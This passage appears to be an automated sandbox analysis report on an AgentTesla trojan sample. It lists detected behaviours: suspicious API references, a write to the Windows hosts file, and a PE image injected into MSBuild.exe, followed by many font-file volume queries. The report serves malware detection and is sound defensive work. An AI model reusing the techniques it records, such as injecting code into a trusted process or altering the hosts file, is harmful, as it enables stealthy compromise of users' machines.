                    Source: 9.0.MSBuild.exe.400000.2.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.2.MSBuild.exe.400000.0.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.0.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Shared/NativeMethodsShared.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Shared/NativeMethodsShared.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Modifies the hosts file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                    Source: MSBuild.exe, 00000009.00000002.529853749.0000000003202000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: MSBuild.exe, 00000009.00000002.529853749.0000000003202000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: program manager
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
